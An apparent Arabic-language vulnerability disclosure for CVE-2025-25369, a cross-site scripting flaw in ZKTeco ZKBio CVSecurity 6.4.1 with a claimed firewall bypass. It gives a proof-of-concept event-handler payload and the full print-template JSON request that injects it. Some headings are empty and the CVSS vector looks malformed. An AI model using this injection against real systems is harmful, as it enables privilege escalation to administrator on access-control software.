
استغلال XSS موثّق لنظام ZKBio CVSecurity الإصدار 6.4.1 مع تجاوز لجدار الحماية (WAF)، مما يتيح تصعيد الامتيازات من محرر القوالب إلى مسؤول عبر قوالب طباعة مصمّمة خصيصًا.
CVE-2025-25369: ثغرة برمجة نصية عبر المواقع (XSS) في ZKTeco ZKBio CVSecurity v.6.4.1
تم اكتشاف ثغرة XSS في ZKBio CVSecurity v.6.4.1.
يمكن للمهاجم استغلال هذه الثغرة بصلاحيات محرر القوالب (Template Editor) ورفع صلاحياته إلى مسؤول.
كما تم تنفيذ تجاوز لجدار الحماية المدمج (WAF).
وقد يؤدي ذلك إلى اختراق كامل للنظام.
درجة CVSS: 4.3 (منخفض)
المتجه: CVSS:4.3 AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L
المكوّن المتأثر:
نواقل الهجوم:
الحمولة:
onpointerdown="prompt(8)"
جميع بيانات الطلب:
[{"printType":""background","width":318,"height":505,"printValue":"/upload/pers/101010101.txt"","direction":"1"},{"cell":"printData.person.pin","leftPoint":"77px","topPoint":"323px","width":117,"height":20,"printType":"text","style":"draggable" onpointerdown="prompt(8)" ui-draggable","color":"0, 0, 0","fontSize":"18px","align":"start","fontFamily":""Arial"","printValue":"pers_person_pin","direction":"1"}]


